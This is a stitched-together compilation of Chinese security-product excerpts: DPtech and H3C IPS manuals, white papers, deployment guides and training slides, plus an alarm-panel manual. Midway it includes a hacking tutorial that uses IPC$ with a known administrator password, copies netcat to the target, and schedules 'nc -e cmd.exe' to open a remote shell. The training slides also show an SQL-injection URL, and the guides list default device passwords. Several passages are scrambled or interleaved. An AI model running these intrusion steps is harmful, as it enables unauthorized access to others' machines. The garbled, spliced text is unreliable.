dptechips2000系列入侵防御系统操作手册
DPtech入侵防御系统DDoS防范技术白皮书概要
杭州迪普科技有限公司DPtech入侵防御系统DDoS防范技术白皮书防范技术白皮书1、概述1.1 背景从上世纪90年代到现在,DoS/DDoS 技术主要经历大约阶段:1) 技术发展时期。
90年代,Internet 开始普及,很多新的DoS 技术涌现。
技术,其中大多数技术至今仍然有效,且应用频度相当高,等等。
2) 从实验室向产业化转换2000年前后,DDoS 出现,Yahoo, Amazon等多个著名网站受到攻击并瘫痪,SQL slammer 等蠕虫造成的事件。
3) “商业时代”最近一两年,宽带的发展使得接入带宽增加,个人电脑性能大幅提高,使越频繁,可以说随处可见,而且也出现了更专业的、用于出租的攻击的威胁已经无处不在。
DDoS(分布式拒绝服务攻击)是产生大规模破坏的武器。
不像访问攻击穿透安全周边来窃取信息,DDoS攻击通过伪造的流量淹没服务器、网络链路和网络设备瘫痪来使得网络系统瘫痪。
1.2 DDoS攻击原理由于DDoS攻击往往采取合法的数据请求技术,再加上傀儡机器,造成最难防御的网络攻击之一。
据美国最新的安全损失调查报告,跃居第一。
DDoS攻击的一个致命趋势是使用复杂的欺骗技术和基本协议,不是采用可被阻断的非基本协议或高端口协议,非常难识别和防御,率的措施只是通过停止服务来简单停止攻击任务,但同时合法用户的请求也被拒绝,中断或服务质量的下降;DDoS事件的突发性,往往在很短的时就可使网络资源和服务资源消耗殆尽。
DDoS攻击主要是利用了Internet协议和Internet基本数据包到任意目的地。
DDoS 攻击分为两种:要么大数据,大流量来90年代末发明和研究过许多新的Ping of death, Smurf, SYN flooding, 还有 Codered, DDoS 攻击越来‘D DoS 攻击经济’。
可以说DDoS (路由器,防火墙等)DDoS攻击成为目前DDoS攻击所造成的经济损失已经如HTTP,Email等协议,而通常采用的包过滤或限制速造成业务的间内,大量的DDoS攻击数据——无偏差地从任何的源头传送压垮网络设备和服务器,要第1页共6页如优点杭州迪普科技有限公司么有意制造大量无法完成的不完全请求来快速耗尽服务器资源。
IPS入侵防御系统+操作手册(V1.05)
1.1.3 SSH 服务
设备支持 SSH 协议,当设备启动了 SSH 服务后,用户可以通过 SSH 方式登录到设备上,对设备 进行远程管理和维护。
表1-3 SSH 服务配置 操作
启动 SSHቤተ መጻሕፍቲ ባይዱ服务
命令 ssh service enable
说明 必选 缺省情况下,SSH 服务处于关闭状态
z 通过 SSH 方式登录设备使用的用户名和密码都是“sshadmin”。 z 通过 Telnet 和 SSH 方式同时登录设备的用户总数不能超过 7。
H3C IPS 入侵防御系统 操作手册
杭州华三通信技术有限公司
资料版本:20090624-C-1.05
声明
Copyright © 2008-2009 杭州华三通信技术有限公司及其许可者 版权所有,保留一切权利。
未经本公司书面许可,任何单位和个人不得擅自摘抄、复制本书内容的部分或全部,并不得以任何 形式传播。
1-2
目录
1 接口管理配置..................................................................................................................................... 1-1 1.1 简介 ................................................................................................................................................... 1-1 1.2 接口管理配置..................................................................................................................................... 1-1 1.2.1 以太网接口配置 ...................................................................................................................... 1-1 1.2.2 Combo接口配置...................................................................................................................... 1-2 1.2.3 接口显示和维护 ...................................................................................................................... 1-2
入侵报警、电视监控使用手册
入侵报警、电视监控使用手册一、对安妨使用单位和人员的要求入侵报警电视监控系统在整个安全防范体系中仅起报警和监视作用,不能达到安全防范的目的。
一般地说同个完整的安全防范系统应包括:技术系统、实体防范和人员防范,即“人防、技防、物防”。
实践证明:只有这三者有机地结合在一起,才能充分发挥技术系统的作用。
因此,拥有入侵报警电视监控等先进技术系统的单位,切不可忽视人防、物防的作用,要始终牢记人的因素第一。
1人防与技防(1) 要有足够能罅可能发生的犯罪的保安力量,以配合公安部门及时抓获犯罪嫌疑人,确保国家和人民生命财产的安全。
(2) 要有抓获犯罪嫌疑人的预案,并进行演练。
(3) 坚持主要领导带班,强化队伍管理和值班守机制度,且落到实处。
(4) 确保值班守机人员的安全,应严格按照安全防范行业的有关标准选建中心控制室;对暂时达不到要求的中心控制室应采取其他补救措施,以保证系统中枢的安全。
(5) 与值机人员配合,定期测试探测器的灵敏度,发现问题及时处理。
(6) 中心控制室应配有可为值班人员利用的自卫武器和消防器材,应能随时向外界(保安佳话室或公安机关)发出紧急报警。
(7) 在恶劣天气或是技术系统检修期间,必须加强现场保卫,以防不测。
(8) 建立技术系统的日常维护制度,且落实到人。
(9) 要使现场工作人员懂得技术设备的使用注意事项,以免引起人为的误报警。
(10) 一旦警情发生,应积极配合公安机关破案。
2值机人员守则(1) 热爱本职工作,具有良好的心理素质。
(2) 本人无犯罪历史。
(3) 认真钻研业、熟练掌握系统操作程序,按时开机,不准私自关机。
(4) 严守保密制度,不准北朝鲜录像带、录音带等转借他人。
(5) 按时上岗,坚守岗位,做到接班人不到位,在班人不下岗,严防脱岗。
(6) 认真做好值班记录(7) 爱护仪器设备,保持其整洁良好的工作状态,仪器设备遇下列情况之一及时报告: 1异常发热 2发出异味 3有异常噪声 4有引线脱落 5其他工作异常情况(8) 在系统检修期间,应积极配合检修人员工作(9) 在任何时候、任何情况下值班人员不得擅自离开中心控制室。
迪普产品配置文档-基础篇(2012-11-05)
26
26
UAG审计及流控
配置步骤(1)
确认组网模式
•
•
透明桥接模式下几乎支持UAG所有功能,流控、审计、限速、web认证等
桥地址切忌与其他接口网段冲突,包括带外管理口
Internet 路由器
镜像
内部网络
交换机
11
11
IPS入侵防御系统
调研信息
组网模式:在线模式、旁路模式 PFP断电保护主机:是否使用,使用接口插卡类型(电、光) 开启安全策略:根据用户需求,如入侵防御、防病毒等 UMC统一管理中心:是否安装
千兆级
UAG3000-GS UAG3000-GA UAG3000-GE
百兆级
UAG3000-MM
UAG3000-MA
UAG3000-ME
UAG3000-CE
UAG3000-MC
UAG3000-MS
•行为审计:一体化行为管控,保护内部数据安全 •带宽管理:P2P等流量的全面透析和管理,提升带宽价值 •安全防护:集成卡巴病毒库,具备恶意攻击防御能力
链路状态正常,则需查看接口管理状态是否关闭,如关闭则需重新开启
20
20
IPS入侵防御系统
问题与排查
管理异常
• 查看路由是否可达,并通过诊断工具排查
21
21
IPS入侵防御系统
问题与排查
业务异常
•
•
开启软件bypass,业务仍然异常,则与IPS设备无关
迪普产品配置文档-基础篇
Beyond Your Imagination
DPtech IPS2000系列入侵防御系统测试方案
DPtech IPS2000测试方案杭州迪普科技有限公司2011年07月目录DPtech IPS2000测试方案 (1)第1章产品介绍 (1)第2章测试计划 (2)2.1测试方案 (2)2.2测试环境 (2)2.2.1 透明模式 (2)2.2.2 旁路模式 (3)第3章测试内容 (4)3.1功能特性 (4)3.2响应方式 (4)3.3管理特性 (4)3.4安全性 (5)3.5高可靠性 (5)第4章测试方法及步骤 (6)4.1功能特性 (6)4.1.1 攻击防护 (6)4.1.2 防病毒 (8)4.1.3 访问控制 (10)4.1.4 最大连接数与DDoS (11)4.1.5 黑名单功能 (12)4.2响应方式 (13)4.2.1 阻断方式 (13)4.2.2 日志管理 (14)4.3管理特性 (15)4.3.1 设备管理 (15)4.3.2 报表特性 (16)4.4安全特性 (17)4.4.1 用户的安全性 (17)4.4.2 设备的安全性 (19)第5章测试总结 (21)第1章产品介绍随着网络的飞速发展,以蠕虫、木马、间谍软件、DDoS攻击、带宽滥用为代表的应用层攻击层出不穷。
传统的基于网络层的防护只能针对报文头进行检查和规则匹配,但目前大量应用层攻击都隐藏在正常报文中,甚至是跨越几个报文,因此仅仅分析单个报文头意义不大。
IPS正是通过对报文进行深度检测,对应用层威胁进行实时防御的安全产品。
但目前大多数IPS都是从原有的IDS平台改制而来,性能低、误报和漏报率高、可靠性差,尤其是在新应用不断增多、特征库不断增长的情况下,性能压力持续增加,只能通过减少或关闭特征库来规避。
这样的IPS不仅起不到安全防御的作用,甚至会成为网络中的故障点。
如何保证IPS在深度检测条件下仍能保证线速处理、微秒级时延?很显然,传统的基于串行设计思想的硬件和软件架构,无论是X86、ASIC或是NP,都无法承受成千上万条且在不断更新中的漏洞库,更不用说再增加病毒库、应用协议库……。
流光2000入侵电脑步骤
IPC是Internet Process Connection的缩写,也就是远程网络连接。
它是Windows NT及Windows 2000特有的一项功能,特点是在同一时间内,两个IP之间只允许建立一个连接。
好了,废话少说,现在进入主题。
如何找到具有IPC漏洞的主机呢?以前我都是组合一个国外的扫描工具(名字我忘了)和KillUSA的LetMeIn,因为很多工作都是手工完成的,所以速度可想而知了。
现在因为有了小榕的流光2000,所以找到这样的主机实在是太简单了,具体操作我就不说了,大家可以参考该软件的说明文档。
好了,假设我们已经找到了一台这样的主机,地址是139.223.200.xxx,管理员帐号是Administrator,密码是123456。
进入命令行方式,正式开工。
需要说明的是,以下操作都是在目标主机没有禁止远程IPC$连接和启动Schedule服务的理想情况下进行的。
F:\》net use \\139.223.200.xxx\ipc$ "123456" /user:"Administrator"命令成功完成。
F:\》copy nc.exe \\139.223.200.xxx\admin$已复制 1 个文件。
F:\》net time \\139.223.200.xxx\\139.223.200.xxx 的当前时间是 2000/12/25 上午 10:25在 \\139.223.200.xxx 的本地时间 (GMT - 07:00) 是 2000/12/25 上午10:35命令成功完成。
F:\》at \\139.223.200.xxx 10:38 nc -l -p 1234 -t -e cmd.exe新增加了一项作业,其作业 ID = 0F:\》telnet 139.223.200.xxx 1234上面的命令很简单,你只要参考一下net,at和nc的用法就可以了。
DPtech IPS2000入侵防御系统(培训文档)
技 术 特 性
未经授权禁止扩散
Page27
IPS攻击防护-Web安全-XSS
原理
网站对输入过滤不严格 攻击者往Web页面的html代码中插入恶意的数据,用户认为该页面 是可信赖的,当用户浏览该页之时,嵌入Web页里的恶意代码/脚
本会被执行
未经授权禁止扩散
Page23
IPS攻击防护-Web安全-SQL注入案例1
构造如下的URL:
http://a.b.c.d/user.php?username=dptech’/*
实际插入的SQL语句变为:
技 术 特 性
SELECT * FROM user WHERE username = ‘dptech'/*' AND pwd = ''
VPN、移动办公、无线网络等应用日渐增多,网络边界日益模糊,以防火 墙为代表的传统边界安全防护手段无能为力
产 生 背 景
边界在哪里?
未经授权禁止扩散
Page4
趋势二:新业务模式层出不穷
产 生 背 景
WEB2.0
云计算
P2P应用
网上支付
未经授权禁止扩散
Page5
趋势三:安全漏洞不断爆发
网络设备、操作系统、数据库软件、应用软件漏洞数不胜数
微软操作系统视频功能组件高危漏洞 微软Office 组件高危漏洞 微软IE 浏览器0day 漏洞 域名系统软件Bind 9 高危漏洞
……
产 生 背 景
Zero Day Attack!
未经授权禁止扩散
Page13
千兆IPS
产 品 介 绍
DPtech IPS2000-GE-N抗DDOS攻击设备配置文档
1.3.3 固定接口和槽位数
表1-3 固定接口规格
项目
规格
管理口
1 个 Console 配置口 2 个 10/100/1000M 网络管理口
USB 接口
1 个 USB 口(Host)
PFP 接口
1 个 PFP 口,提供与 PFP 设备的连接
业务接口
图形目录
图 1-1 DPtech IPS2000-GE-N前视图
1-2
图 1-2 DPtech IPS2000-GE-N前面板指示灯
1-3
图 1-3 DPtech IPS2000-GE-N后视图
1-4
图 1-4 以太网接口
1-7
图 3-1 设备安装流程
3-2
图 3-2 安装设备于工作台
3-4
图 3-3 安装挂耳及外滑轨
表示系统告警
第 1 章 产品介绍
1-2
DPtech IPS2000-GE-N 抗 DDOS 攻击设备 安装手册
指示灯 (红色)
状态 常灭
说明 表示系统正常
快闪(8Hz) 表示系统异常
(12) 电源指示灯 PWR0(绿 色)
常亮 常灭
表示电源 0 工作正常 表示电源 0 不在位
快闪(8Hz) 表示电源 0 出现故障
3-3
iv
3.3.3 安装设备到 19 英寸机柜 3.4 连接接地线 3.5 连接接口线缆 3.5.1 连接配置口线缆 3.5.2 连接网络管理口 3.5.3 连接业务口 3.6 连接电源线 3.7 安装后检查
第 4 章 设备启动及软件升级
4.1 设备启动 4.1.1 搭建配置环境 4.1.2 设备上电 4.1.3 启动过程 4.2 WEB默认登录方式
DPtech IPS2000系列入侵防御系统开局指导资料
DPtech IPS2000开局指导杭州迪普科技有限公司2011年07月目录DPtech IPS2000开局指导 (1)第1章前期调研 (1)1.1调研内容 (1)1.2确定部署方案 (2)第2章实施步骤 (3)2.1准备工作 (3)2.2部署条件 (3)2.3安装断掉保护PFP(如需安装) (3)2.4实施方案 (4)2.4.1 基本配置方案1-旁路部署 (4)2.4.2 基本配置方案2-透明部署 (8)2.4.3 基本配置方案3-混合部署 (11)2.4.4 扩展配置 (12)2.4.5 高级配置 (13)2.4.6 其他配置 (14)第3章实施注意事项 (18)第1章前期调研1.1 调研内容1.2 确定部署方案根据调研及交流的结果,确定物理部署位置、逻辑部署位置、开启功能策略等第2章实施步骤2.1 准备工作向用户介绍入侵防御系统实施内容、产品与用户沟通入侵防御系统实际部署时间2.2 部署条件设备正常启动连接线(双绞线、光纤等)正常可用部署机柜满足部署条件(机柜空间、插座数、功率载荷)管理地址已分配,且满足互通等要求确定部署方式(组网模式、部署链路数)2.3 安装断掉保护PFP(如需安装)将PFP插卡板安装在PFP主机上将内网连接线(如SW引出)连接至PFP“1”口,外网连接线(如FW引出)连接至PFP“4”口,流量于1——4间物理透传,此时验证网络畅通性PFP插板“2、3”口平行连接IPS主机“A、B”口,即实施后的流量流向应为:局域网——PFP1口——PFP2口——IPSA口——IPSB口——PFP3口——PFP4口——互联网,链路上下行连接错误,会导致日志分析异常此时切忌连接PFP主机与IPS主机的“USB”连接线,需完成全部功能配置后,再连接“USB”连接线2.4 实施方案2.4.1 基本配置方案1-旁路部署组网拓扑图注意:此模式下只做检测,不做控制PC直连设备管理口,缺省IP地址为192.168.0.1;用户名:admin,密码:admin在【网络管理】->【组网模式】中,修改某一接口对组网模式为“旁路模式”注意:如上图所示,eth1/0与eth1/1接口对组网模式改为旁路模式后,此接口将无接口对概念,eth1/0与eth1/1独立存在,且均可作为旁路检测接口在【网络管理】->【网络用户组】中,添加IP用户组如果设备需要跨网段管理,则需在【网络管理】->【单播IPv4路由】中,添加指定或默认路由在【IPS规则】中创建规则后,引用到【IPS策略】中的指定旁路接口在【日志管理】->【业务日志】中,开启将IPS日志输出UMC功能(IP:UMC安装服务器的IP地址,PORT:9514)在【审计分析】->【流量分析】中,开启将流量分析日志输出UMC功能(IP:UMC 安装服务器的IP地址,PORT:9502)在服务器安装UMC后,用IE访问其网卡IP地址(注:UMC地址需与IPS管理地址互通),用户名:admin,密码:UMCAdministrator在【设备管理】->【设备列表】中,添加IPS设备在【系统管理】->【时间同步配置】中,点击“立即同步”(注:UMC与IPS时间不一致,会影响日志统计)在【网络监控】中查看流量分析日志,在【攻击监控】中查看IPS日志(如果未使用UMC,则在IPS设备【IPS日志】中查看)2.4.2 基本配置方案2-透明部署PC直连设备管理口,缺省IP地址为192.168.0.1;用户名:admin,密码:admin在【网络管理】->【网络用户组】中,添加IP用户组如果设备需要跨网段管理,则需在【网络管理】->【单播IPv4路由】中,添加指定或默认路由在【IPS规则】中创建规则后,引用到【IPS策略】中的指定旁路接口在【日志管理】->【业务日志】中,开启将IPS日志输出UMC功能(IP:UMC安装服务器的IP地址,PORT:9514)在【审计分析】->【流量分析】中,开启将流量分析日志输出UMC功能(IP:UMC 安装服务器的IP地址,PORT:9502)在服务器安装UMC后,用IE访问其网卡IP地址(注:UMC地址需与IPS管理地址互通),用户名:admin,密码:UMCAdministrator在【设备管理】->【设备列表】中,添加IPS设备在【系统管理】->【时间同步配置】中,点击“立即同步”(注:UMC与IPS时间不一致,会影响日志统计)在【网络监控】中查看流量分析日志,在【攻击监控】中查看IPS日志(如果未使用UMC,则在IPS设备【IPS日志】中查看)2.4.3 基本配置方案3-混合部署如上图所示,eth1/0与eth1/1为旁路模式,可独立做旁路检测(IDS);eth1/2与eth1/3,eth1/4与eth1/5为在线模式,存在接口对概念,可做在线检测(IPS);即实现了同时在线检测与旁路检测的混合模式2.4.4 扩展配置【防病毒】,在【常用功能】->【防病毒】中,添加防病毒策略;下图策略为:从eth1/0与eth1/1接口流入的流量,进行防病毒策略的安全匹配(流行度概念,请参见用户手册)【带宽限速】,在【扩展功能】->【应用防火墙】->【网络应用带宽限速】中,添加带宽限速策略;下图策略为:从eth1/0接口流入,且源IP组为test,目的IP组为All users的流量,P2P限速5000kbps(注意单位);从eth1/1接口流入,且源IP组为All users,目的IP组为test的流量,P2P限速5000kbps(注意单位)【访问控制】,在【扩展功能】->【应用防火墙】->【网络应用访问控制】中,添加访问控制策略;下图策略为:从eth1/0接口流入,且源IP组为test,目的IP组为All users的流量,阻断网络应用-即时通讯;从eth1/1接口流入,且源IP组为All users,目的IP组为test的流量,阻断网络应用-即时通讯【URL】,在【扩展功能】->【应用防火墙】->【URL过滤】中,添加URL过滤策略;下图策略为:从eth1/0接口流入,且源IP组为test的流量,对主机名为的URL进行过滤2.4.5 高级配置端口捆绑(注意:虚接口绑定遵循上下行,即上行口不能与下行口绑定)自定义IPS特征(根据报文参数,自定义设置IPS特征,并引入到IPS策略)带宽限速/访问控制自定义应用组(创建自定义网络应用组后,可应用到带宽限速/访问控制策略中)URL分类库及推送配置(注意:此功能在有URL License,且已经导入URL特征库的情况下,方可使用)2.4.6 其他配置添加管理员,并设置管理权限设置Web访问协议参数导入/出配置文件,需重启(推荐在同一软件版本下使用)修改接口同步状态(注意:当开启接口同步状态下,当接口对中的eth1/0口down后,在数秒种后,eth1/1口的管理状态会dwon,如恢复管理状态需在console口下操作,重新no shutdown该接口状态)创建IP用户组,IP用户群,IP用户簇(IP可实现分级管理,并应用到策略)Web页面修改管理口地址软件bypass,开启后流量不做安全检测(VIP流量概念,请参见用户手册)黑名单基础DDos配置(添加防护网段配置后,根据网络情况,下发DDos防护策略)基本攻击防护策略第3章实施注意事项管理服务器的安全性管理服务器安装Windows2003 Server或者Windows2008操作系统后,管理员一定要确保对Windows进行重要安全补丁修补,规范操作系统口令和密码设置,保证正常启动运行。
IP-2000安装使用说明书(VISTA-120)
IP-2000安装使用说明IP-2000是专门用于配合ADEMCO集团VISTA-120/128B/250/20P(若使用VISTA-20P,请确认相应软件的支持)系例主机的网络接口模块,通过该模块,VISTA-120系列主机可以直接“上网”,通过这个标准的网络达到远程接收主机信息,控制主机的目的。
如上图所示:IP-2000的PCB板左下角有六个接线端子,最左边的两个接线端子标着VccRed(红色)和GndBlk(黑色),分别接报警主机键盘线的电源和地(红色和黑色),接下来的两个端子分别标注着GRN OUT (绿色)和YEL IN(黄色),同样连接报警主机键盘总线的绿色和黄色端子(主机说明书上有说明)。
第五个标有DTR OUT(正常情况下DTR可以不接)和A-RX IN的端子,分别连接主机串口接口J8的左起1和7端子。
注意该电源必须采用主板上的键盘电源。
在第一排端子的右边是连接网络的RJ45网络端口,直接插上你的网上即可。
要注意该网络采用10M速率,即你的HUB和网卡都应支持10M网速。
复位按钮主要用于你在特殊情况下的接口板复位,例如主机断电,重新接线或由于其他原因停止响应的情况。
本接口板用于模拟主机键盘的操作,所以一定要在主机中为该接口板设置相应的接口地址。
该接口板采用主机的16-23号设备地址来模拟键盘,所以主机的16-23地址需设置为键盘(设备类型1),并且16号地址管辖子系统1,17号地址管辖子系统2,18号地址管辖子系统3,依次类推,23号管辖子系统8。
并且要注意的是,当你把某个地址设置成键盘时,系统会提示你该键盘是否可以管辖整个主机(包括其他子系统),这是一定要选择0,否则计算机不能控制主机。
另外,为了保证IP2000模拟多个键盘的顺畅性,除了连接键盘外,请不要再在主机键盘总线上连接诸如4204、5882、4286等设备。
如果确有需要分成多个子系统,才去设置相应数目的子系统,否则子系统数目越少越好。
DPtech IPS2000-GM-N入侵防御系统安装手册
� �
说明:
PFP(Power Fault Protector,掉电保护设备),为 IPS 提供掉电保护的设备,PFP 的相关信 息请参见手册《DPtech IPS PFP 快速入门》。
1.3.4 输入电源
表 1-4 输入电源
项目 电源模块(AC) 规格 额定电压范围:90V~264V AC;50/60Hz 额定电流:4A 电源模块(DC) 额定电压范围:-40.5V~-72V DC
iii
DPtech IPS2000-GM-N 入侵防御系统 安装手册
目 录
第 1 章 产品介绍 1.1 产品概述 1.2 DPTECH IPS2000-GM-N 产品外观 1.3 产品规格 1.3.1 存储器 1.3.2 外形尺寸和重量 1.3.3 固定接口 1.3.4 输入电源 1.3.5 工作环境 1.4 产品组件 1.4.1 处理器及存储器 1.4.2 各类接口 1.4.3 PFP 接口 第 2 章 安装前的准备 2.1 通用安全注意事项 2.2 检查安装场所 2.2.2 温度/湿度要求 2.2.3 洁净度要求 2.2.4 防静电要求 2.2.5 抗干扰要求 2.2.6 防雷击要求 2.2.7 接地要求 2.2.8 布线要求 1-1 1-1 1-1 1-3 1-3 1-4 1-4 1-4 1-5 1-5 1-5 1-5 1-6 2-1 2-1 2-1 2-1 2-2 2-2 2-3 2-3 2-3 2-3
第 1 章 产品介绍
3
DPtech IPS2000-GM-N 入侵防御系统 安装手册
1.3.2 外形尺寸和重量
表 1-2 外形尺寸和重量规格
项目 外型尺寸(W×D×H) 重量 规格 436mm×470mm×44.8mm 8.0Kg
(售后)DPtech IPS系列产品培训
25
DoS/DDoS
Syn flood是一种最常见的DDoS攻击。服务器接受syn 报文后需要消耗资源保存半连接状态,通过大量的非 法泛洪syn报文,迫使服务器消耗大量的资源保存非法 半连接而不能提供正常服务 Syn cookie算法是专门针对syn flood攻击进行防护的技 术。通过截取syn报文,并使用不消耗任何资源的算法 计算出cookie值并给客户端syn_ack应答,达到保护服 务器的目的。
主动防护 通过将违法url进行阻断以及主动断开违法连接达到主动防 护的目的。
22
URL过滤 配置简介
URL过滤,指设备对IP地址、主机名,并可通过配置正则表达式的方 式,对整个HTTP报文做精确匹配;网络管理员可根据实际网络应用
23
DoS/DDoS
DoS 攻击
24
DoS/DDoS
DDoS 攻击
500Mbps 100W 2 W/S
200Mbps 20W 1W/S
高度
2U
2U
1U
1U
1U
1U
接口
2个管理口(千兆自适应、 电口)12个千兆自适用电口 (内置3组掉电保护)12个千 兆自适应光口,2个万兆光 口,1个RJ45串口,1 个USB 口
2个管理口(千兆自适应、电 口)6个千兆自适应电口(内 置3组掉电保护)6 个千兆自 适应光口
32
流量控制模块
流量控制的灵活性
对特定网络用户组 黑/白名单 对特定时间段 以上进行各种组合/用户自定义
33
基础功能配置---访问控制配置
34
35
型号 IPS2000-TS-N IPS2000-GE-N IPS 2000-GA-N IPS 2000-GS-N IPS 2000ME-N IPS 2000-MA -N 吞吐量 并发会话数 新建会话数
DPtech IPS2000-GC-N入侵防御系统安装手册V1.0
2.1 通用安全注意事项
在移动设备前,请先将设备断电。 请将设备放置在干燥通风的地方。不要让液体进入设备。 保持设备清洁。 不要在设备上堆积物品。 非专业维修人员,请不要随意打开设备机壳。
1.4.2 各类接口
1. Console 口 IPS 提供了一个 RS232 异步串行配置口(Console),可用来连接终端计算机,以进行系统的调 试、配置、维护、管理和主机软件程序加载等工作。 2. 以太网接口
(1) (2) (3) (4) (5) (6) (7) (8)
(1) 1000M 以太网光接口(0) (3) 10/100/1000M 以太网电接口(0) (5) 10/100/1000M 以太网电接口(2) (7) 10/100/1000M 以太网电接口 (4)
DPtech IPS2000-GC-N 前面板指示灯 2. 后视图
(2)
(1)
(1) 交流电源插座
(2) 接地端子
DPtech IPS2000-GC-N 后视图
1.3 产品规格
1.3.1 存储器
存储器规格
项目 Flash 内存类型及容量 CF 卡 规格 4MB外形尺寸和重量
外形尺寸和重量规格
项目 外型尺寸(W×D×H) 规格 430mm×261mm×44mm
第 1 章 产品介绍
3
DPtech IPS2000-GC-N 入侵防御系统 安装手册 项目 重量 规格 3.1Kg
1.3.3 固定接口和槽位数
固定接口规格
项目 PFP 接口 USB 接口 业务接口 规格 1 个 PFP 口,提供与 PFP 设备的连接 1 个 USB 口(Host) 固定接口: 6 个 10/100/1000M 电接口 2 个 1000M 光接口
IPS T200DDoS典型配置
Secpath IPS系列T200 DDoS典型配置一、组网需求:对T200进行配置,使其能够对内部HTTP服务器(例如:IP地址为192.168.10.100,T200上与其相连的接口属于段0的内部域)进行DDoS攻击防范,并且能够保证正常的用户访问不受干扰。
二、组网图:三、配置步骤:◆应用系统预定义的DDoS策略“DDoS Policy”到段0●在导航栏中选择“对象管理 > 段管理 > 段策略管理”,单击<应用策略>按钮。
●选择段为“0”。
●选择策略类型为“DDoS策略”。
●选择策略为“DDoS Policy”。
●选择保护对象区域为“内部区域”。
●输入保护对象IP地址为“192.168.10.100”,并单击<添加>按钮使其加入到保护对象列表中。
●单击<应用>按钮完成操作。
预定义的DDoS策略◆将配置下发到设备●完成上述的配置后,页面会自动跳转到“段策略管理”的页面,单击<激活>按钮,弹出确认对话框。
●在确认对话框中单击<确认>按钮后,将配置下发到设备。
配置下发◆进行流量学习●在“段策略管理”的页面选择策略类型为“DDoS策略”。
●单击新创建的段策略所对应的流量学习<开始>按钮,开始进行流量学习。
●进行一段时间的流量学习后,再单击流量学习<结束>按钮,结束流量学习。
流量学习◆查看生成的检测规则●在导航栏中选择“对象管理 > DDoS > 检测规则管理”。
●选择防护对象为“段ID:0 方向:从外网到内网策略名:DDoS Policy”,列表中显示所有生成的检测规则。
查看检测规则◆进行检测防护●在导航栏中选择“对象管理 > 段管理 > 段策略管理”。
●单击新创建的段策略所对应的检测防护<开始>按钮,开始进行检测防护。
检测防护四、注意事项:配置DDoS时需要注意如下事项:(1) 已经应用到段上的DDoS策略不能删除。
迪普 DPtech IPS2000技术白皮书
DPtech IPS2000技术白皮书杭州迪普科技有限公司2013年8月目录一、概述 (3)二、产品简介 (3)三、产品特色技术介绍 (4)1.先进的特征提取技术 (4)1.1.协议特征形式化建模流程 (4)1.2.特征数据挖掘算法模型 (5)2.攻击防御技术 (5)2.1.基于指纹特征的检测技术 (5)2.1.1 蠕虫攻击防护 (6)2.1.2 SQL注入防护 (6)2.1.3 XSS攻击防护 (7)2.1.4 缓冲区溢出防护 (7)2.1.5 系统漏洞攻击防护 (7)2.1.6 碎片攻击防护 (7)2.1.7 未知威胁检测防护 (8)2.2.异常流量检测技术 (8)3.病毒过滤技术 (8)4.网络带宽限制技术 (10)4.1.基于用户的带宽管理 (10)4.2.基于服务的带宽管理 (10)5.网络访问控制技术 (10)6.URL过滤技术 (10)7.高可靠安全性 (11)7.1.完善的HA部署方式 (11)7.2.支持冗余电源 (12)7.3.丰富的Bypass功能 (12)一、概述随着网络的飞速发展,以蠕虫、木马、间谍软件、DDoS攻击、带宽滥用为代表的应用层攻击层出不穷。
传统的基于网络层的防护只能针对报文头进行检查和规则匹配,但目前大量应用层攻击都隐藏在正常报文中,甚至是跨越几个报文,因此仅仅分析单个报文头意义不大。
IPS正是通过对报文进行深度检测,对应用层威胁进行实时防御的安全产品。
但目前大多数IPS都是从原有的IDS平台改制而来,性能低、误报和漏报率高、可靠性差,尤其是在新应用不断增多、特征库不断增长的情况下,性能压力持续增加,只能通过减少或关闭特征库来规避。
这样的IPS不仅起不到安全防御的作用,甚至会成为网络中的故障点。
如何保证IPS在深度检测条件下仍能保证线速处理、微秒级时延?很显然,传统的基于串行设计思想的硬件和软件架构,无论是X86、ASIC或是NP,都无法承受成千上万条且在不断更新中的漏洞库,更不用说再增加病毒库、应用协议库……。
迪普 DPtech IPS2000技术白皮书
DPtech IPS2000技术白皮书杭州迪普科技有限公司2013年8月目录一、概述 (3)二、产品简介 (3)三、产品特色技术介绍 (4)1.先进的特征提取技术 (4)1.1.协议特征形式化建模流程 (4)1.2.特征数据挖掘算法模型 (5)2.攻击防御技术 (5)2.1.基于指纹特征的检测技术 (5)2.1.1 蠕虫攻击防护 (6)2.1.2 SQL注入防护 (6)2.1.3 XSS攻击防护 (7)2.1.4 缓冲区溢出防护 (7)2.1.5 系统漏洞攻击防护 (7)2.1.6 碎片攻击防护 (7)2.1.7 未知威胁检测防护 (8)2.2.异常流量检测技术 (8)3.病毒过滤技术 (8)4.网络带宽限制技术 (10)4.1.基于用户的带宽管理 (10)4.2.基于服务的带宽管理 (10)5.网络访问控制技术 (10)6.URL过滤技术 (10)7.高可靠安全性 (11)7.1.完善的HA部署方式 (11)7.2.支持冗余电源 (12)7.3.丰富的Bypass功能 (12)一、概述随着网络的飞速发展,以蠕虫、木马、间谍软件、DDoS攻击、带宽滥用为代表的应用层攻击层出不穷。
传统的基于网络层的防护只能针对报文头进行检查和规则匹配,但目前大量应用层攻击都隐藏在正常报文中,甚至是跨越几个报文,因此仅仅分析单个报文头意义不大。
IPS正是通过对报文进行深度检测,对应用层威胁进行实时防御的安全产品。
但目前大多数IPS都是从原有的IDS平台改制而来,性能低、误报和漏报率高、可靠性差,尤其是在新应用不断增多、特征库不断增长的情况下,性能压力持续增加,只能通过减少或关闭特征库来规避。
这样的IPS不仅起不到安全防御的作用,甚至会成为网络中的故障点。
如何保证IPS在深度检测条件下仍能保证线速处理、微秒级时延?很显然,传统的基于串行设计思想的硬件和软件架构,无论是X86、ASIC或是NP,都无法承受成千上万条且在不断更新中的漏洞库,更不用说再增加病毒库、应用协议库……。
DPtech IPS2000 N系列产品彩页
MA-N
ME-N
GS-N
GA-N
GE-N
IPS2000TS-N
在线模式、监听模式、混合模式
支持缓冲溢出攻击、蠕虫、木马、病毒、SQL 注入、网页篡改、恶意代码、网络钓鱼、间谍软件、 DoS/DDoS、流量异常等攻击的防御 内置卡巴斯基病毒库,支持 10 万条以上病毒库 支持防御文件型、网络型和混合型等各类病毒 支持新一代虚拟脱壳和行为判断技术,准确查杀各种变种病毒、未知病毒。
IPS2000-GA-N 部署灵活、99.999%的高可靠性设计,适用于 中型网络的数据中心和大型网络出口。
Байду номын сангаас
IPS2000-GE-N
IPS2000-TS-N
高性能、99.999%的高可靠性设计,适用于大 高性能、99.999%的高可靠性设计,适用于大中
中型网络的出口、数据中心和运营商核心网络。 型网络的出口、数据中心和运营商核心网络。
迅雷、BT、eDonkey、eMule、网际快车、PPLive、QQLive、MSN、QQ 等
